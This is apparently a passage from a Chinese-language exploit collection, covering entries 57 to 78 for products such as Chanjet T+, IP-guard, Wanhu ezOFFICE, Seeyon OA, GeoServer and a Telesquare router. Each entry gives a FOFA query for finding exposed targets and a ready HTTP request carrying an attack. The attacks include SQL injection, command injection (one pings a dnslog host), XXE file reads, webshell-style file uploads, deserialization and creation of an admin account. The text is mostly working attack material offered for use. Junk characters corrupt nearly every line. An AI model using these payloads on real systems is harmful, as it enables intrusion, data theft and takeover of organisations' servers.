8 w5 g( t s1 R( N% w3 I N, J4 M' uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
+ s9 O; t) ?( ?, qContent-Type: application/json
, S/ [. z- `7 X; k9 u8 z# z
/ F; J4 x7 n& n& B, l{
8 d8 }' w& X- [0 s4 S "storeID":{
: N/ `4 p8 l% K "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",7 L4 l; n9 R, }2 t8 c
"MethodName":"Start",
X% ^, c+ ~7 }" G "ObjectInstance":{( x$ l# M6 x( V- d: U! m3 F6 o' |
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
5 m" O* F6 b4 p" u# [) S1 v$ p1 f% A# S "StartInfo": {
6 V7 f6 i9 i, ^' q1 g$ r; H "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
% k8 _. i; Z* Z+ [6 I0 S) z "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
- F& O7 j! D, M7 d2 T# T2 V" W }
6 |0 ?- w3 Y' |! L }
( m: u9 t$ D2 Y# z! @) S" [. D }8 F" \# t! Q2 ~
}' {8 X& @! O) z5 R, x* d6 E+ _
+ q6 w- @6 Q, T# l' w* O! l. d$ y* [5 i( \
57. 畅捷通T+ keyEdit.aspx SQL注入0 X( a0 e3 g; d; h k# U; i" }6 i
FOFA:app="畅捷通-TPlus"
. C7 z9 M- h; C6 i' [& ]GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1. ?4 K- Z! q4 }! [! I3 A0 O" g
Host: host4 m* [! ^- E, H' W/ o: E
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.362 V' k* _/ {- Y h1 e& W
Accept-Charset: utf-8* x2 I* d7 \" y
Accept-Encoding: gzip, deflate: J+ I6 l9 ^+ R2 N+ l
Connection: close
( p' }* J `+ x3 [, A) o$ t2 ^! w# x& M$ _% p1 o4 u: U5 g& G0 B2 f7 f
# @9 |; o. {( T58. 畅捷通T+ KeyInfoList.aspx sql注入
/ ?/ ~+ T/ ]. L; r$ L' |+ fFOFA:app="畅捷通-TPlus"
. f: ~7 M! k5 A0 ]4 e$ f+ vGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
* Q4 M; v* k( GHost: your-ip6 S+ n" S# `( T, `# D9 w
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
" t" {5 X# O3 a/ [5 ?" tAccept-Charset: utf-8
9 |) s) k% J( `* `2 v# ^0 j. ZAccept-Encoding: gzip, deflate' ?7 G2 {+ v3 B, a
Connection: close6 ^; Y. [' L' v! v
& P: `* W' U! J# L+ e7 ]( ]" H
) }; z0 f7 Y$ V2 C: E+ w59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
. ]- }3 M$ O: q+ EFOFA: title="@XETUX" && title="XPOS" && body="BackEnd". f9 i; n# b) H4 p7 s
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
8 w7 b4 U* B$ i' M! zHost: 192.168.86.128:9090 A4 H: ^) J- F: \
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36' @3 t8 ~ Z" u2 |. U" z
Connection: close0 A. G; ^7 I+ K( W3 n
Content-Length: 16699 b' I( i3 D9 Y: A5 p
Accept: */*
$ d, K1 w2 q' v7 f1 T4 \+ C+ u7 eAccept-Language: en+ F7 _ C2 b- b4 I; }4 }1 J
Content-Type: application/x-www-form-urlencoded
: P5 t! e# C, @# N% o1 T$ fAccept-Encoding: gzip
" q- b8 C1 l1 f) Q& c1 \; F8 z5 ^ _* { a' |0 y& D' O
PAYLOAD
$ _/ g7 h$ ?8 g
! i; g/ X% K7 I3 S% k6 ]
+ N* h3 J& |7 o* }4 X$ C60. 百卓Smart管理平台 importexport.php SQL注入
8 ?" X1 R/ Z% \( {FOFA:title="Smart管理平台"/ {+ c$ q) q' G/ g
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1. w h) ]+ p: P" _ M/ u
Host:2 s0 F& D6 i( p& B) J J1 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36/ b, j# v' C4 R) P1 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* N2 b2 t6 x5 a- S! Y5 }' _
Accept-Encoding: gzip, deflate
& M9 e# X! O% n6 e6 I8 ?Accept-Language: zh-CN,zh;q=0.9- H3 P. q9 S' l' R' T1 t+ l ^! K+ l; G
Connection: close$ x% }, [9 }4 t& K' v0 r
5 U* n! ?# x# G5 P( H* d2 D) ^+ ~
1 Q$ T* J2 r) V* \1 H( j
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
, M5 t& T& q5 UFOFA: title="欢迎使用浙大恩特客户资源管理系统"* ~% `. F3 V' l3 x1 j& Y
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.10 x8 D) G' V* f2 q8 H6 ^# m3 J
Host: x.x.x.x; e( S/ }* h( F6 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" m+ Q9 L- m2 g0 W6 G
Connection: close" S8 Y, g0 @3 R9 J7 o- {6 D
Content-Length: 272 [$ x! n9 w* O' a% a2 I1 ^
Accept: */*. u N+ B) `( _9 S
Accept-Encoding: gzip, deflate
: H2 k/ v9 @7 T5 P! I$ LAccept-Language: en
+ c: b/ |9 `; U; H- u2 w, S( z' @Content-Type: application/x-www-form-urlencoded
! L+ H' j+ [ _; z) e5 S* N$ ?: a7 u! q7 f9 j" _! Q
8uxssX66eqrqtKObcVa0kid98xa7 v' p, o: x; G& l& \
: T* {. _1 A0 v, `
; V3 G |+ ^2 a" N& R1 c
62. IP-guard WebServer 远程命令执行
5 S, S+ Z% u4 O& ~9 Z) [FOFA:"IP-guard" && icon_hash="2030860561" h) R4 p8 |$ n- q
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
+ u7 R8 |& x; a& a% x# {6 } oHost: x.x.x.x
+ D5 h& W0 q! U" a* G8 yUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
3 I" r9 q! v. q' z- u; U9 FConnection: close" `& ^& s ` J8 F5 h: ]0 m) S- `
Accept: */*
1 \/ h1 |( N# r3 q$ e% qAccept-Language: en
6 G7 y- H, W2 m9 uAccept-Encoding: gzip: m; A# _0 X8 W/ [6 r1 Y- L* J
) x3 k$ n9 Z, S# D' m$ I
; D( U; q' ]1 K S2 ?访问4 P7 q4 {+ p. b
3 h- O! F! A: R* K5 E
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1" @3 J5 M( o g8 U+ D
Host: x.x.x.x+ M& K9 L' c: E" e9 d
$ A0 ^' P- x& Z; P$ z1 A" h$ p$ J/ p# x+ L8 T6 n. b# z+ z
63. IP-guard WebServer任意文件读取4 T. t) K3 x3 O* K, V
IP-guard < 4.82.0609.03 ]! m$ P5 J. G) u! U
FOFA:icon_hash="2030860561"
3 C, x+ H h) v' N4 E- y0 VPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1% S2 h o0 P3 K! h/ m1 p
Host: your-ip! X3 O( b! R/ D8 r5 N, B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
: h& g U: D/ Q, ^& J9 }0 e. I3 D& vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' J1 V8 L! S# }$ j8 B( o) c8 n4 ]* c9 RAccept-Encoding: gzip, deflate
7 d4 _# \, P- t) y6 GAccept-Language: zh-CN,zh;q=0.9
6 b5 j7 R! Z9 d& _; U8 dConnection: close
& b1 |" }. d5 R9 [( c' uContent-Type: application/x-www-form-urlencoded9 f. _0 b5 Y' v3 w
, h& ` a5 Q" h$ ^. g$ Wpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A* |; C6 B4 B$ G( E
6 N& D `! k4 h5 r/ {. n64. 捷诚管理信息系统CWSFinanceCommon SQL注入0 `4 X! g. N+ {" A/ @2 F; _5 y
FOFA:body="/Scripts/EnjoyMsg.js"
1 q% E" Z8 E' B, {9 L; [# p: UPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1% |- M) c) j& O; r v$ y
Host: 192.168.86.128:9001" |3 W, w. w; a |" {2 u
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
& L, u ^8 ~- |! m, I4 s) e1 vConnection: close
! j. ^- M7 w. O9 E0 DContent-Length: 369
( B( U# |( J2 sAccept: */*
' }! \# y4 b1 n9 lAccept-Language: en
8 l+ K3 X" ?# n& c$ W+ IContent-Type: text/xml; charset=utf-8
6 Z6 U, z+ S8 BAccept-Encoding: gzip" f! }0 _0 q+ ~" C
! j: Q& M& V( ^+ ?1 l$ q
<?xml version="1.0" encoding="utf-8"?>8 ~" j, Z, `% Q7 T) v, o6 v, x
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
# S3 Y( T8 C' R, I8 e$ m<soap:Body>
; H1 H- q" C) P$ l+ A* E! W9 p <GetOSpById xmlns="http://tempuri.org/">
( O5 U: n* d8 g <sId>1';waitfor delay '0:0:5'--+</sId>% [6 n: G% `$ S( b7 V% o# T: w0 P
</GetOSpById>, N2 ~% C4 x3 @! X8 A
</soap:Body>
2 l" d4 q: ~0 J- ^! k</soap:Envelope>& B) C5 H# g! u
8 a) p2 ?3 h( S2 U. ?% w, d
, y' F2 v8 @, ?( J( n# a65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
; N! R" n! N* v3 k$ \) kFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"3 r. u% F# l5 B3 S3 y
响应200即成功创建账号test123456/123456
$ [! K2 p# b% e! X0 xPOST /SystemMng.ashx HTTP/1.1, [: c2 X' F, P$ k. h% c
Host:$ e0 b- _- X6 t$ o- h( O. B
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
, m B) c) b! K/ a% H e5 O4 |Accept-Encoding: gzip, deflate
7 {: l* ?, L) f8 GAccept: */*: L# ]# Q) C- K, @8 I
Connection: close9 e/ M- S# y1 l& x( ^( K9 K0 W- U
Accept-Language: en
0 i/ f, L8 w5 U" n7 cContent-Length: 174
9 w3 b* o m' p
& n6 A m0 V- e9 P. w3 loperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
; P* [. L5 I* c8 b% v" @0 F k
: n( s! k0 B! T# [" @4 e! f; n6 a: U) A7 s: Q
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入! s) [& E: r- n9 {/ |6 w# \
FOFA:app="万户ezOFFICE协同管理平台"
2 a$ R6 ?+ d1 d: d! n, F2 y3 V7 t
4 Z9 ]' P- M% b! y+ M" S/ QGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
# x4 [4 D* r H9 p' _Host: x.x.x.x: p9 F ~- x/ g" l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
6 F3 }# I% D2 ?5 t. B5 G DConnection: close
% h5 S* l0 ?5 f- s4 CAccept: */*
2 S' k$ X. p! N, CAccept-Language: en
: D/ J% S* \9 C$ M$ O: yAccept-Encoding: gzip" H) I$ x" u W0 D) ]& K$ t6 F8 W
. a6 r0 m$ o8 _ W$ `
5 K9 |8 w$ U& J- P5 b( r
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
! F' i, g0 A: ~5 H& _5 j5 e! _( `8 T* h2 g+ b
67. 万户ezOFFICE wpsservlet任意文件上传 ]9 u" z6 S% \- H8 C" {, {
FOFA:app="万户网络-ezOFFICE"
* D! E6 g- I9 J8 x7 @$ k- Q: TnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型8 C" ^4 g% {6 g
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1, W; R! u S+ k/ N% G) W2 K
Host: x.x.x.x, k5 H! ?0 T: B0 g1 w/ p
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
3 _2 i! \. a5 J7 w; Q' t5 O5 ?/ NContent-Length: 173
) Y9 P; \' Z9 [& ^ v _, ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8# R& A8 u- U' A Z }* H
Accept-Encoding: gzip, deflate6 C' `* H- K, w
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.37 b3 }& X4 C2 d* C
Connection: close
# l7 O- \: D5 W: Q: YContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp7 N4 t* a! V+ V
DNT: 1
9 L* ^; Z) k% J, M/ @' LUpgrade-Insecure-Requests: 1& o. J- f( X. O" {0 I
" \# n: p" H+ u* {/ t3 @--ufuadpxathqvxfqnuyuqaozvseiueerp: s. m* x4 j0 `* U7 Y. N
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
' q1 L7 I6 V; c1 b1 u- u: P. Z3 D
<% out.print("sasdfghjkj");%>8 i/ v- M' k2 K; a) ~
--ufuadpxathqvxfqnuyuqaozvseiueerp--
$ C @. Q$ S7 x, [( E5 P) P9 o2 R# X3 w6 S L! D
! P6 ?$ k% d3 e
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
1 @3 P, T( i4 w
$ F S! o! W2 u7 ^7 v& B68. 万户ezOFFICE wf_printnum.jsp SQL注入, j) R& i* c( u
FOFA:app="万户ezOFFICE协同管理平台"
8 n X; N8 W/ e( v wGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.15 n7 l9 L2 c9 H
Host: {{host}}9 }, ~/ w5 y$ J1 N7 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36# }( C* d% v: L2 D2 V% R9 A
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8$ D- X- u+ u T `3 U7 M
Accept-Encoding: gzip, deflate, l% q* `2 p/ F3 A% q7 M8 @$ z/ |
Accept-Language: zh-CN,zh;q=0.9
' t* s2 W8 s) uConnection: close0 G+ N2 s; z, W9 ]
$ Q( C% v* B4 ?7 W5 M2 L" \$ U
- u7 g& g6 c: o' Z7 [% ]69. 万户 ezOFFICE contract_gd.jsp SQL注入
- R; t3 C5 O6 s jFOFA:app="万户ezOFFICE协同管理平台"
4 J) ~! I2 ?. T5 q7 H/ C; v" d8 x7 vGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
3 n5 M# h6 W/ B9 k, k: G YHost: your-ip; ?! b P9 _1 f, `8 w
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+ s+ h1 _! t8 Q) g/ F1 ]! }1 RAccept-Encoding: gzip, deflate
4 b; \* ^# y; o, x( [Accept: */*
5 U& B9 C( R0 n" `: K/ ~- jConnection: keep-alive; e$ L' I% r, S/ j0 k: j8 n( ^9 I
6 L+ U+ ~/ F: X7 e! @
0 N& l2 O* m4 r* {, N9 H5 d70. 万户ezEIP success 命令执行
, B/ k9 G3 Y- p+ n- v4 ~& A! XFOFA:app="万户网络-ezEIP") l8 D9 B. |" }3 O2 J. S1 z
POST /member/success.aspx HTTP/1.1
, U6 m$ `1 w, z1 X% Y& THost: {{Hostname}}
% T R5 h f2 j' w4 Z& l* d. W" @+ VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
' S9 [8 y; D2 t: T4 g0 ]SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=, _4 f) v3 F) v( x: r( d; Z
Content-Type: application/x-www-form-urlencoded; p: M! c5 L; i
TYPE: C0 ~: F& K3 `% R* O+ u* H! }
Content-Length: 16702
% {& [% z; F: T% M) I1 p
% J2 u8 u; Z8 [9 t: f__VIEWSTATE=PAYLOAD
. Z7 B2 V8 |+ h4 b6 g5 H' O1 |6 K9 v1 {/ w1 h
6 s3 \5 L0 ~- o7 j
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
& a5 r" W8 Y9 P6 Q3 Z5 KFOFA:body="PM2项目管理系统BS版增强工具.zip"0 @" h* V7 J; L4 o: e
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1& O2 {% p7 I+ r: k4 C4 w
Host: x.x.x.xx.x.x.x
1 m4 P' j* T% g9 R6 d D7 I& NUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
: a1 \$ v) t: R+ \' J/ dConnection: close
5 @ g$ `8 x2 I- b: PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" [# k$ p4 U; [9 Z, f/ tAccept-Encoding: gzip, deflate
( J6 c6 Q3 Z, C. a& HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ O1 G, p. D! o. w( W& RUpgrade-Insecure-Requests: 1* u5 I& p9 v: [3 u1 Q. ?
* q' t6 Z! T) ~& `7 r+ `0 Z, r6 g% Z* }1 E
72. 致远OA getAjaxDataServlet XXE
) m M& k7 ~( H. f- L" DFOFA:app="致远互联-OA"
; ` Y( p1 B$ }4 DPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
/ t O8 F0 M% y# r/ UHost: 192.168.40.131:8099
% |8 |) T5 x% f% _4 S% X2 UUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
) o$ _6 T' D: PConnection: close
9 X7 D" v5 S" E! zContent-Length: 583
X# I4 Z: k" @. _Content-Type: application/x-www-form-urlencoded
1 n/ e6 V0 J) {( F) A cAccept-Encoding: gzip
7 ~ q/ _4 I' \7 R, y* a
9 F Q$ r/ U5 @& c5 x3 t iS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
6 t, V4 H6 a+ w7 m( P- L8 x
+ ?6 Q' d: D2 L: s( c4 t9 Y+ l9 I. u6 I5 G7 O& G7 [. Q
73. GeoServer wms远程代码执行
0 M" n+ s, B; ZFOFA:icon_hash=”97540678”: t8 O) d! m) R2 c3 n5 _4 y
POST /geoserver/wms HTTP/1.1
5 ?% C: v+ f0 z( w& ZHost:
0 u3 y4 v3 ?7 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
, T5 n, \& t3 Y0 V u2 |Content-Length: 1981. F* ~" @# X, ]
Accept-Encoding: gzip, deflate
, e; S) f) ^& }# C8 kConnection: close) E' R" ?# x: ^5 K0 h
Content-Type: application/xml
5 D1 `' q" n# b; k, wSL-CE-SUID: 3" E( P$ D- G4 h, N6 ?5 _
$ p9 ~$ T9 H9 ?' nPAYLOAD* q) Y/ L" O7 u2 j
0 P* h7 i9 L# l9 b) y0 }
, K; ]1 h# W5 q* T74. 致远M3-server 6_1sp1 反序列化RCE* j" ^& }) H+ |' [/ a$ o
FOFA:title="M3-Server"3 j+ z8 [. f2 g/ X
PAYLOAD
- s, I: C7 {- d5 k- c6 W# D
9 Z. d( B. \! f& Q75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE; L& S1 l5 n7 ?! ^
FOFA:app="TELESQUARE-TLR-2005KSH"
: b2 x6 S8 K) L ~+ y1 L" yGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
7 d: ~( i, N A/ ?- G' a9 MHost: x.x.x.x9 W9 ? h) N: L' {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 \% L- z+ x3 r; H/ q! i6 xConnection: close
: y2 n# m( L0 P) V3 dAccept: */*
3 e( n( @) O2 s% [ p0 XAccept-Language: en% k8 K6 n$ M% G. v8 D
Accept-Encoding: gzip8 c8 X( k) I& c- P6 A
( C& W/ Z7 Y3 W9 {
4 _0 X1 l3 c& _: F9 [
GET /cgi-bin/test28256.txt HTTP/1.1$ W& t. r7 U* G6 [ E7 l
Host: x.x.x.x7 Z% ~/ h' o' m/ W2 E! L
# K4 b6 [8 C- m
7 [0 x3 T3 V' D8 B: e0 p) O. Z- u
76. 新开普掌上校园服务管理平台service.action远程命令执行
& w4 i# h4 O# v) A ]0 U2 X# E6 f MFOFA:title="掌上校园服务管理平台"+ D5 r6 ]' W* z) o& n
POST /service_transport/service.action HTTP/1.1 w7 ^4 |! h# c8 w
Host: x.x.x.x
$ p6 j, V( [3 D7 V6 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.07 h5 Y- b4 `6 F
Connection: close
k1 f; g, M& g' pContent-Length: 211
+ m+ [& t, k7 ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. f0 g: E; M, M% U% O; r9 N
Accept-Encoding: gzip, deflate" ]+ m6 t5 k2 L+ A- m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 N- c" u0 ]- q" f
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4$ j2 F' q2 Y+ w7 R; ~
Upgrade-Insecure-Requests: 11 `. X& O3 o, O' X7 a
/ Z+ B0 E2 K* ~" v* M- u
{
* p3 t" f8 A7 T7 Y"command": "GetFZinfo",# L$ F3 u) V F
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
+ o6 o2 E0 `2 i4 R9 R4 P7 O0 V& p ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
" b, p" z- a( f}! a% @% U6 a+ [0 _
4 X1 P h6 J. _" r. D9 E% B- ?
4 [9 K& u% G& ?; r1 gGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.14 ^. u. ~7 w& s
Host: x.x.x.x
" t4 K' D3 s) a9 n! B. z! W
5 H- e o8 J4 ?& o7 F0 r( g8 _$ T. L2 H! P+ f
; F! X- M5 Z& H7 N+ U8 r6 v
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
% I! R, f; _/ j' j1 g( D6 M4 W4 lFOFA:body="F22WEB登陆"
. R, B) t Q( `5 x; APOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1: y2 \4 K$ p4 h4 ~
Host: x.x.x.x
: Z, ~: q/ ` QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36* Q' v3 t9 V- s% N1 v( l
Connection: close
/ }% v0 H, @6 U7 X/ F" E/ }Content-Length: 433/ U1 n. X, Z5 x0 m9 [9 K. F/ X
Accept: */*0 @% o& r0 m5 Z" W5 A
Accept-Encoding: gzip, deflate: j0 y' ^1 L5 b y/ I) \% n
Accept-Language: zh-CN,zh;q=0.9 K8 x T0 P# B
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
& n) S. O; X! P" B O& n
4 @+ ~. z+ l( L------------398jnjVTTlDVXHlE7yYnfwBoix
0 f6 M b7 G; C0 T" E2 M0 U- FContent-Disposition: form-data; name="folder"3 _1 q. g/ U2 l2 `6 q
) }9 w0 n/ v/ X+ y! L; E1 v0 k1 `/upload/udplog% L4 y [4 t( a9 ?; u5 G
------------398jnjVTTlDVXHlE7yYnfwBoix, D% c' f' M+ G0 F9 Y& {; h
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"/ a- a: x) Z2 Q& C2 h
Content-Type: application/octet-stream
9 _% w& k: X. r. A9 Y
0 o. g' e+ l) A5 \+ v' C$ k! p$ Fhello1234567: l" i3 I* B: v$ s# p- D' X7 Y
------------398jnjVTTlDVXHlE7yYnfwBoix0 {# y+ c) q8 `0 Q/ P% A4 T4 z
Content-Disposition: form-data; name="Upload"
1 P9 f% L9 }! D
0 G, b% } C8 A9 H' @! x4 W) MSubmit Query, d& p. [; G. i4 Z& H5 T& L B% ]9 b
------------398jnjVTTlDVXHlE7yYnfwBoix--
6 C1 g4 F' {1 y+ V6 k: |2 z! C
9 \0 p/ p; H4 }& c. U! y5 m9 |6 {) ?' N# R# N5 f" ^5 k0 V
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
& n- t! c, X9 r8 y) V! j% O9 VFOFA:icon_hash="2001627082"
% G) q F. U1 W0 _# q, ]1 E1 }0 {POST /Platform/System/FileUpload.ashx HTTP/1.1" N' z6 @' X& b4 b7 H5 ^( p
Host: x.x.x.x
8 o! Z) M( S1 }; ]4 \8 J1 uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 k1 p$ p- E. T. ^% K. e
Connection: close
6 f* G- h1 Q# J" w+ F- ?8 CContent-Length: 336
' y/ `4 `- k u* z1 \: ~! Z1 T) cAccept-Encoding: gzip+ d: \* @- i4 x8 s
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
) ~( Z/ T" y3 X
; A2 a. v: ^! O% n/ N; @& {' I------YsOxWxSvj1KyZow1PTsh98fdu6l
n* p7 ?1 \* [ [! {5 I( XContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"- M0 k( T7 n5 i
Content-Type: image/png
( |4 h, m/ @ d9 s- h% x' u# d, j6 v3 R5 G) p T5 P
YsOxWxSvj1KyZow1PTsh98fdu6l
) k, G8 \$ ?' c. R------YsOxWxSvj1KyZow1PTsh98fdu6l* ~/ V7 A( r4 O% t. M! u( S
Content-Disposition: form-data; name="target"
3 S' U5 g+ Q E$ z
